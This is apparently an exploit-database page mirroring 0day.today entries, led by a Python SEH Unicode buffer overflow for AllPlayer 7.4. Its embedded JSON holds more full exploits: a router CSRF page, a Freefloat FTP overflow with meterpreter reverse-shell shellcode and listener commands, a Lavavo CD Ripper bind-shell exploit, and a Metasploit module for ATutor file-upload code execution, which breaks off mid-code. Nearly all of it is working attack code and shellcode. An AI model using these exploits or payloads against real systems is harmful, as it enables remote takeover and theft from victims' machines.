Search...

AllPlayer 7.4 - SEH Buffer Overflow (Unicode) Exploit

2019-04-09T00:00:00

ID 1337DAY-ID-32512
Type zdt
Reporter Chris Au
Modified 2019-04-09T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()


#  0day.today [2019-04-11]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-32512", "bulletinFamily": "exploit", "title": "AllPlayer 7.4 - SEH Buffer Overflow (Unicode) Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2019-04-09T00:00:00", "modified": "2019-04-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/32512", "reporter": "Chris Au", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2019-04-11T21:42:30", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "3aa73750dff5f1c896c4435c28429fd5"}, {"key": "href", "hash": "b28c366790c7a9cf1a9e14b053af069c"}, {"key": "modified", "hash": "257cac0be7c14d6807bded7608654ef7"}, {"key": "published", "hash": "257cac0be7c14d6807bded7608654ef7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b45993f89fb500baed6c0e79c875b0f2"}, {"key": "sourceData", "hash": "89a8362e2c5b83eff96e1707093a6e93"}, {"key": "sourceHref", "hash": "662ecb25033997ae11a99d1d38c99c07"}, {"key": "title", "hash": "f6e1bc94e25f4c0ffc24b83612b65013"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "3d275ca0d74116af32e4b831d49b344099203c974d18cbe0528d66acf6688ac6", "viewCount": 1, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2019-04-11T21:42:30"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32641", "1337DAY-ID-32634", "1337DAY-ID-32595", "1337DAY-ID-32531", "1337DAY-ID-32529", "1337DAY-ID-32525", "1337DAY-ID-32514", "1337DAY-ID-32518", "1337DAY-ID-32466", "1337DAY-ID-32472"]}, {"type": "fireeye", "idList": ["FIREEYE:1A61A821CE69D378830204326B2E938C"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32512", "SECURITYVULNS:VULN:14695"]}, {"type": "seebug", "idList": ["SSV:85513", "SSV:62027"]}, {"type": "saint", "idList": ["SAINT:39552A768A14F561C49AE81E9E058E30", "SAINT:8B25D0B9043F412FEBFAAC119CBD87D3", "SAINT:FA4FCDE96D7598CC10207A31600CE243"]}, {"type": "exploitdb", "idList": ["EDB-ID:32512"]}], "modified": "2019-04-11T21:42:30"}, "vulnersScore": 0.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/32512", "sourceData": "#!/usr/bin/python -w\r\n\r\n#\r\n# Exploit Author: Chris Au\r\n# Exploit Title: AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)\r\n# Vulnerable Software: AllPlayer V7.4\r\n# Vendor Homepage: https://www.allplayer.org/\r\n# Version: 7.4\r\n# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe\r\n# Tested Windows Windows 7 SP1 x86\r\n#\r\n#\r\n# PoC\r\n# 1. generate evil.txt, copy contents to clipboard\r\n# 2. open AllPlayer\r\n# 3. select \"Open video or audio file\", click \"Open URL\"\r\n# 4. paste contents from clipboard\r\n# 5. select OK\r\n# 6. calc.exe\r\n#\r\n\r\nfilename=\"evil.txt\"\r\nheader = \"http://\"\r\njunk = \"\\xcc\" * 301\r\nnseh = \"\\x90\\x45\"\r\nseh = \"\\x7a\\x74\" #pop pop retn\r\nvalign = (\r\n\"\\x55\" #push ebp\r\n\"\\x45\" #align\r\n\"\\x58\" #pop eax\r\n\"\\x45\" #align\r\n\"\\x05\\x20\\x11\" #add eax,11002000\r\n\"\\x45\" #align\r\n\"\\x2d\\x18\\x11\" #sub eax,11001900\r\n\"\\x45\" #align\r\n\"\\x50\" #push eax\r\n\"\\x45\" #align\r\n\"\\xc3\" #retn\r\n)\r\n#nop to shell\r\nnop = \"\\xcc\" * 115\r\nshellcode = (\r\n\"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI\"\r\n\"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA\"\r\n\"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K\"\r\n\"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq\"\r\n\"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI\"\r\n\"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU\"\r\n\"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K\"\r\n\"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j\"\r\n\"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM\"\r\n\"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c\"\r\n\"Lnc51hOuipAA\")\r\nfill = \"\\x45\" * 5000\r\nbuffer = header + junk + nseh + seh + valign + nop + shellcode + fill\r\ntextfile = open(filename , 'w')\r\ntextfile.write(buffer)\r\ntextfile.close()\r\n\n\n# 0day.today [2019-04-11] #"}

{"zdt": [{"lastseen": "2019-05-02T03:54:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32634", "href": "https://0day.today/exploit/description/32634", "title": "Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "\r\n\r\n<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>IWR 3000N - CSRF on authenticated administrator</title>\r\n </head>\r\n <body>\r\n <button onclick=\"exploit()\">Exploit!</button>\r\n <p>Click the button to get the login and password.</p>\r\n <script>\r\n function exploit(){\r\n $.get( \"http://localhost:80/v1/system/user\" )\r\n .done(( data ) => {\r\n alert( data );\r\n })\r\n .fail(function( err, status) {\r\n alert( status );\r\n });\r\n }\r\n </script>\r\n <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\r\n </body>\r\n</html>\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32634"}, {"lastseen": "2019-05-02T03:54:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32641", "href": "https://0day.today/exploit/description/32641", "title": "Freefloat FTP Server 1.0 - SIZE Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Free Float FTP 1.0 \"SIZE\" Remote Buffer Overflow\r\n# Exploit Author: Kevin Randall\r\n# Vendor Homepage:\r\n# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip\r\n# Version: Firmware: Free Float FTP 1.0\r\n# Tested on: Windows XP Professional Service Pack 2\r\n# CVE : N/A\r\n\r\n#Generate Shellcode with MSFVenom\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\\x00\\x0A\\x0D' -f python\r\n#Setup listener \"use exploit/multi/handler\" \"set payload windows/meterpreter/reverse_tcp\" \"set LHOST IP.OF.LOCAL.MACHINE\" \"set LPORT 4444\" \"exploit\"\r\n\r\n#!/usr/bin/python\r\n\r\nimport socket\r\nimport sys\r\n\r\nbuf = \"\"\r\nbuf += \"\\xba\\x99\\x2c\\xb1\\x7d\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5d\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x56\\x31\\x55\\x13\\x83\\xed\\xfc\\x03\\x55\\x96\\xce\"\r\nbuf += \"\\x44\\x81\\x40\\x8c\\xa7\\x7a\\x90\\xf1\\x2e\\x9f\\xa1\\x31\\x54\"\r\nbuf += \"\\xeb\\x91\\x81\\x1e\\xb9\\x1d\\x69\\x72\\x2a\\x96\\x1f\\x5b\\x5d\"\r\nbuf += \"\\x1f\\x95\\xbd\\x50\\xa0\\x86\\xfe\\xf3\\x22\\xd5\\xd2\\xd3\\x1b\"\r\nbuf += \"\\x16\\x27\\x15\\x5c\\x4b\\xca\\x47\\x35\\x07\\x79\\x78\\x32\\x5d\"\r\nbuf += \"\\x42\\xf3\\x08\\x73\\xc2\\xe0\\xd8\\x72\\xe3\\xb6\\x53\\x2d\\x23\"\r\nbuf += \"\\x38\\xb0\\x45\\x6a\\x22\\xd5\\x60\\x24\\xd9\\x2d\\x1e\\xb7\\x0b\"\r\nbuf += \"\\x7c\\xdf\\x14\\x72\\xb1\\x12\\x64\\xb2\\x75\\xcd\\x13\\xca\\x86\"\r\nbuf += \"\\x70\\x24\\x09\\xf5\\xae\\xa1\\x8a\\x5d\\x24\\x11\\x77\\x5c\\xe9\"\r\nbuf += \"\\xc4\\xfc\\x52\\x46\\x82\\x5b\\x76\\x59\\x47\\xd0\\x82\\xd2\\x66\"\r\nbuf += \"\\x37\\x03\\xa0\\x4c\\x93\\x48\\x72\\xec\\x82\\x34\\xd5\\x11\\xd4\"\r\nbuf += \"\\x97\\x8a\\xb7\\x9e\\x35\\xde\\xc5\\xfc\\x51\\x13\\xe4\\xfe\\xa1\"\r\nbuf += \"\\x3b\\x7f\\x8c\\x93\\xe4\\x2b\\x1a\\x9f\\x6d\\xf2\\xdd\\x96\\x7a\"\r\nbuf += \"\\x05\\x31\\x10\\xea\\xfb\\xb2\\x60\\x22\\x38\\xe6\\x30\\x5c\\xe9\"\r\nbuf += \"\\x87\\xdb\\x9c\\x16\\x52\\x71\\x97\\x80\\x9d\\x2d\\xa7\\x52\\x76\"\r\nbuf += \"\\x2f\\xa8\\x43\\xda\\xa6\\x4e\\x33\\xb2\\xe8\\xde\\xf4\\x62\\x48\"\r\nbuf += \"\\x8f\\x9c\\x68\\x47\\xf0\\xbd\\x92\\x82\\x99\\x54\\x7d\\x7a\\xf1\"\r\nbuf += \"\\xc0\\xe4\\x27\\x89\\x71\\xe8\\xf2\\xf7\\xb2\\x62\\xf6\\x08\\x7c\"\r\nbuf += \"\\x83\\x73\\x1b\\x69\\xf4\\x7b\\xe3\\x6a\\x91\\x7b\\x89\\x6e\\x33\"\r\nbuf += \"\\x2c\\x25\\x6d\\x62\\x1a\\xea\\x8e\\x41\\x19\\xed\\x71\\x14\\x2b\"\r\nbuf += \"\\x85\\x44\\x82\\x13\\xf1\\xa8\\x42\\x93\\x01\\xff\\x08\\x93\\x69\"\r\nbuf += \"\\xa7\\x68\\xc0\\x8c\\xa8\\xa4\\x75\\x1d\\x3d\\x47\\x2f\\xf1\\x96\"\r\nbuf += \"\\x2f\\xcd\\x2c\\xd0\\xef\\x2e\\x1b\\x62\\xf7\\xd0\\xd9\\x4d\\x50\"\r\nbuf += \"\\xb8\\x21\\xce\\x60\\x38\\x48\\xce\\x30\\x50\\x87\\xe1\\xbf\\x90\"\r\nbuf += \"\\x68\\x28\\xe8\\xb8\\xe3\\xbd\\x5a\\x59\\xf3\\x97\\x3b\\xc7\\xf4\"\r\nbuf += \"\\x14\\xe0\\xf8\\x8f\\x55\\x17\\xf9\\x6f\\x7c\\x7c\\xfa\\x6f\\x80\"\r\nbuf += \"\\x82\\xc7\\xb9\\xb9\\xf0\\x06\\x7a\\xfe\\x0b\\x3d\\xdf\\x57\\x86\"\r\nbuf += \"\\x3d\\x73\\xa7\\x83\"\r\n\r\n\r\nshellcode = '\\x90'*20 + buf\r\npayload = \"A\"*247+\"\\xF6\\xC1\\xB3\\x7C\"+ shellcode +\"C\"*(749-len(shellcode))\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n##Add FTP Server IP Here###############\r\nconnect = s.connect(('192.168.0.9',21))\r\n#######################################\r\ns.recv(1024)\r\ns.send('USER anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('PASS anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('SIZE' + payload + '\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('QUIT\\r\\n')\r\n\r\ns.close()\r\n\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32641"}, {"lastseen": "2019-04-27T01:54:10", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-04-25T00:00:00", "published": "2019-04-25T00:00:00", "id": "1337DAY-ID-32595", "href": "https://0day.today/exploit/description/32595", "title": "Lavavo CD Ripper 4.20 Local SEH Exploit", "type": "zdt", "sourceData": "# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit\r\n# Date: 25.04.2019\r\n# Vendor Homepage:https://www.lavavosoftware.com\r\n# Software Link: https://lavavo-cd-ripper.jaleco.com/download\r\n# Exploit Author: Achilles\r\n# Tested Version: 4.20\r\n# Tested on: Windows XP SP3 EN\r\n# Windows 7 Sp1 x64\r\n\r\n# 1.- Run python code : Lavavo.py\r\n# 2.- Open EVIL.txt and copy content to Clipboard\r\n# 3.- Open LavavoCDRipper.exe and click UNLOCK.\r\n# 4.- Paste the Content of EVIL.txt into the 'License Activation Name'\r\n# 5.- License Key 123456789\r\n# 6.- Click 'Unlock Now' and you will have a bind shell port 3110.\r\n\r\n#!/usr/bin/env python\r\nimport struct\r\n\r\nbuffer = \"\\x41\" * 300\r\nnseh = \"\\xeb\\x06\\x90\\x90\" #jmp short 6\r\nseh = struct.pack('<L',0x1003157d) #libsndfile.dll\r\nnops = \"\\x90\" * 20\r\n\r\n#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b \"\\x00\\x0a\\x0d\" -i 1 -f python\r\n#badchars \"\\x00\\x0a\\x0d\"\r\nshellcode = (\"\\xb8\\xf4\\xc0\\x2a\\xd0\\xdb\\xd8\\xd9\\x74\\x24\\xf4\\x5a\\x2b\" \r\n\"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\xb6\\xce\\xc8\"\r\n\"\\x25\\xca\\x27\\x8e\\xc6\\x32\\xb8\\xef\\x4f\\xd7\\x89\\x2f\\x2b\"\r\n\"\\x9c\\xba\\x9f\\x3f\\xf0\\x36\\x6b\\x6d\\xe0\\xcd\\x19\\xba\\x07\"\r\n\"\\x65\\x97\\x9c\\x26\\x76\\x84\\xdd\\x29\\xf4\\xd7\\x31\\x89\\xc5\"\r\n\"\\x17\\x44\\xc8\\x02\\x45\\xa5\\x98\\xdb\\x01\\x18\\x0c\\x6f\\x5f\"\r\n\"\\xa1\\xa7\\x23\\x71\\xa1\\x54\\xf3\\x70\\x80\\xcb\\x8f\\x2a\\x02\"\r\n\"\\xea\\x5c\\x47\\x0b\\xf4\\x81\\x62\\xc5\\x8f\\x72\\x18\\xd4\\x59\"\r\n\"\\x4b\\xe1\\x7b\\xa4\\x63\\x10\\x85\\xe1\\x44\\xcb\\xf0\\x1b\\xb7\"\r\n\"\\x76\\x03\\xd8\\xc5\\xac\\x86\\xfa\\x6e\\x26\\x30\\x26\\x8e\\xeb\"\r\n\"\\xa7\\xad\\x9c\\x40\\xa3\\xe9\\x80\\x57\\x60\\x82\\xbd\\xdc\\x87\"\r\n\"\\x44\\x34\\xa6\\xa3\\x40\\x1c\\x7c\\xcd\\xd1\\xf8\\xd3\\xf2\\x01\"\r\n\"\\xa3\\x8c\\x56\\x4a\\x4e\\xd8\\xea\\x11\\x07\\x2d\\xc7\\xa9\\xd7\"\r\n\"\\x39\\x50\\xda\\xe5\\xe6\\xca\\x74\\x46\\x6e\\xd5\\x83\\xa9\\x45\"\r\n\"\\xa1\\x1b\\x54\\x66\\xd2\\x32\\x93\\x32\\x82\\x2c\\x32\\x3b\\x49\"\r\n\"\\xac\\xbb\\xee\\xe4\\xa4\\x1a\\x41\\x1b\\x49\\xdc\\x31\\x9b\\xe1\"\r\n\"\\xb5\\x5b\\x14\\xde\\xa6\\x63\\xfe\\x77\\x4e\\x9e\\x01\\x7b\\xa9\"\r\n\"\\x17\\xe7\\xe9\\xa5\\x71\\xbf\\x85\\x07\\xa6\\x08\\x32\\x77\\x8c\"\r\n\"\\x20\\xd4\\x30\\xc6\\xf7\\xdb\\xc0\\xcc\\x5f\\x4b\\x4b\\x03\\x64\"\r\n\"\\x6a\\x4c\\x0e\\xcc\\xfb\\xdb\\xc4\\x9d\\x4e\\x7d\\xd8\\xb7\\x38\"\r\n\"\\x1e\\x4b\\x5c\\xb8\\x69\\x70\\xcb\\xef\\x3e\\x46\\x02\\x65\\xd3\"\r\n\"\\xf1\\xbc\\x9b\\x2e\\x67\\x86\\x1f\\xf5\\x54\\x09\\x9e\\x78\\xe0\"\r\n\"\\x2d\\xb0\\x44\\xe9\\x69\\xe4\\x18\\xbc\\x27\\x52\\xdf\\x16\\x86\"\r\n\"\\x0c\\x89\\xc5\\x40\\xd8\\x4c\\x26\\x53\\x9e\\x50\\x63\\x25\\x7e\"\r\n\"\\xe0\\xda\\x70\\x81\\xcd\\x8a\\x74\\xfa\\x33\\x2b\\x7a\\xd1\\xf7\"\r\n\"\\x5b\\x31\\x7b\\x51\\xf4\\x9c\\xee\\xe3\\x99\\x1e\\xc5\\x20\\xa4\"\r\n\"\\x9c\\xef\\xd8\\x53\\xbc\\x9a\\xdd\\x18\\x7a\\x77\\xac\\x31\\xef\"\r\n\"\\x77\\x03\\x31\\x3a\")\r\npad =\"C\" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))\r\npayload = buffer + nseh + seh + nops + shellcode + pad\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n\tf.write(payload)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept:\r\n\tprint \"File cannot be created\"\n\n# 0day.today [2019-04-27] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32595"}, {"lastseen": "2019-04-12T19:22:58", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-04-12T00:00:00", "published": "2019-04-12T00:00:00", "id": "1337DAY-ID-32531", "href": "https://0day.today/exploit/description/32531", "title": "ATutor 2.2.4 - file_manager Remote Code Execution Exploit #RCE", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"ATutor < 2.2.4 'file_manager' Remote Code Execution\",\r\n 'Description' => %q{\r\n This module allows the user to run commands on the server with teacher user privilege.\r\n The 'Upload files' section in the 'File Manager' field contains arbitrary file upload vulnerability.\r\n The \"$IllegalExtensions\" function has control weakness and shortcomings.\r\n It is possible to see illegal extensions within \"constants.inc.php\". (exe|asp|php|php3|php5|cgi|bat...)\r\n However, there is no case-sensitive control. Therefore, it is possible to bypass control with filenames such as \".phP\", \".Php\"\r\n It can also be used in dangerous extensions such as \"shtml\" and \"phtml\". \r\n The directory path for the \"content\" folder is located at \"config.inc.php\".\r\n For the exploit to work, the \"define ('AT_CONTENT_DIR', 'address')\" content folder must be located in the web home directory or the address must be known.\r\n\r\n This exploit creates a course with the teacher user and loads the malicious php file into server.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'AkkuS <\u00d6zkan Mustafa Akku\u015f>', # Discovery & PoC & MSF Module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '' ],\r\n [ 'URL', 'http://pentest.com.tr/exploits/TeemIp-IPAM-2-4-0-new-config-Command-Injection-Metasploit.html' ],\r\n [ 'URL', 'https://atutor.github.io/' ],\r\n [ 'URL', 'http://www.atutor.ca/' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DisclosureDate' => '09 April 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),\r\n OptString.new('USERNAME', [true, 'The Teacher Username to authenticate as']),\r\n OptString.new('PASSWORD', [true, 'The Teacher password to authenticate with']),\r\n OptString.new('CONTENT_DIR', [true, 'The content folder location', 'content'])\r\n ],self.class)\r\n end\r\n\r\n def exec_payload\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"#{datastore['CONTENT_DIR']}\", @course_id, \"#{@fn}\")\r\n })\r\n end\r\n\r\n def peer\r\n \"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}\"\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def print_error(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def print_good(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n##\r\n# Version and Vulnerability Check\r\n##\r\n def check\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"#{datastore['CONTENT_DIR']}/\")\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n if res.code == 404\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Appears\r\n end\r\n##\r\n# csrftoken read and create a new course\r\n##\r\n def create_course(cookie, check)\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"mods\", \"_core\", \"courses\", \"users\", \"create_course.php\"),\r\n 'headers' =>\r\n {\r\n 'Referer' => \"#{peer}#{datastore['TARGETURI']}users/index.php\",\r\n 'cookie' => cookie,\r\n },\r\n 'agent' => 'Mozilla'\r\n })\r\n\r\n if res && res.code == 200 && res.body =~ /Create Course: My Start Pag/\r\n @token = res.body.split('csrftoken\" value=\"')[1].split('\"')[0]\r\n else\r\n return false\r\n end \r\n\r\n @course_name = Rex::Text.rand_text_alpha_lower(5)\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(@token, nil, nil,'form-data; name=\"csrftoken\"')\r\n post_data.add_part('true', nil, nil, 'form-data; name=\"form_course\"')\r\n post_data.add_part(@course_name, nil, nil, 'form-data; name=\"title\"')\r\n post_data.add_part('top', nil, nil, 'form-data; name=\"content_packaging\"')\r\n post_data.add_part('protected', nil, nil, 'form-data; name=\"access\"')\r\n post_data.add_part('Save', nil, nil, 'form-data; name=\"submit\"')\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST', \r\n 'data' => data,\r\n 'agent' => 'Mozilla',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'cookie' => cookie,\r\n 'uri' => normalize_uri(target_uri.path, \"mods\", \"_core\", \"courses\", \"users\", \"create_course.php\") \r\n })\r\n\r\n location = res.redirection.to_s\r\n if res && res.code == 302 && location.include?('bounce.php?course')\r\n @course_id = location.split('course=')[1].split(\"&p\")[0]\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n##\r\n# Upload malicious file // payload integration\r\n##\r\n def upload_shell(cookie, check)\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"bounce.php?course=\" + @course_id),\r\n 'headers' =>\r\n {\r\n 'Referer' => \"#{peer}#{datastore['TARGETURI']}users/index.php\",\r\n 'cookie' => cookie,\r\n },\r\n 'agent' => 'Mozilla'\r\n })\r\n\r\n ucookie = \"ATutorID=#{$2};\" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*);/\r\n\r\n file_name = Rex::Text.rand_text_alpha_lower(8) + \".phP\"\r\n @fn = \"#{file_name}\"\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part('10485760', nil, nil, 'form-data; name=\"MAX_FILE_SIZE\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"uploadedfile\\\"; filename=\\\"#{file_name}\\\"\")\r\n post_data.add_part('Upload', nil, nil, 'form-data; name=\"submit\"')\r\n post_data.add_part('', nil, nil, 'form-data; name=\"pathext\"')\r\n\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST', \r\n 'data' => data,\r\n 'agent' => 'Mozilla',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'cookie' => ucookie,\r\n 'uri' => normalize_uri(target_uri.path, \"mods\", \"_core\", \"file_manager\", \"upload.php\") \r\n })\r\n\r\n if res && res.code == 302 && res.redirection.to_s.include?('index.php?pathext')\r\n print_status(\"Trying to upload #{file_name}\")\r\n return true\r\n else\r\n print_status(\"Error occurred during uploading!\")\r\n return false\r\n end\r\n end\r\n##\r\n# Password encryption with csrftoken\r\n##\r\n def get_hashed_password(token, password, check)\r\n if check\r\n return Rex::Text.sha1(password + token)\r\n else\r\n return Rex::Text.sha1(Rex::Text.sha1(password) + token)\r\n end\r\n end\r\n##\r\n# User login operations\r\n##\r\n def login(username, password, check)\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"login.php\"),\r\n 'agent' => 'Mozilla',\r\n })\r\n\r\n token = $1 if res.body =~ /\\) \\+ \\\"(.*)\\\"\\);/\r\n cookie = \"ATutorID=#{$1};\" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/\r\n if check\r\n password = get_hashed_password(token, password, true)\r\n else\r\n password = get_hashed_password(token, password, false)\r\n end\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"login.php\"),\r\n 'vars_post' => {\r\n 'form_password_hidden' => password,\r\n 'form_login' => username,\r\n 'submit' => 'Login'\r\n },\r\n 'cookie' => cookie,\r\n 'agent' => 'Mozilla'\r\n })\r\n cookie = \"ATutorID=#{$2};\" if res.get_cookies =~ /(.*); ATutorID=(.*);/\r\n\r\n if res && res.code == 302\r\n if res.redirection.to_s.include?('bounce.php?course=0')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, res.redirection),\r\n 'cookie' => cookie,\r\n 'agent' => 'Mozilla'\r\n })\r\n cookie = \"ATutorID=#{$1};\" if res.get_cookies =~ /ATutorID=(.*);/\r\n if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, res.redirection),\r\n 'cookie' => 